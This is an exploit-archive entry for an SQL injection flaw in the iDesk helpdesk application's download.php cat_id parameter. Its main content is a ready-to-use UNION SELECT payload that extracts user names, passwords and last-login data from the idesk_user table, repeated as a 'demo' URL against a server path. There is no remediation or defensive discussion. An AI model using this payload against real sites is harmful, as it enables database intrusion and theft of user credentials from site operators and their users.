iDesk (download.php cat_id) SQL Injection Vulnerability

2009-12-13T00:00:00
ID 1337DAY-ID-10210
Type zdt
Reporter Manas58
Modified 2009-12-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
iDesk (download.php cat_id) SQL Injection Vulnerability
=======================================================

###############################################################
##############################################################
##
##  SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
##
##
###############################################################
###############################################################
##
## [ Exploit ]       
##
##     download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ]
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
  
 
#########################################################################################################
#########################################################################################################



#  0day.today [2018-02-13]  #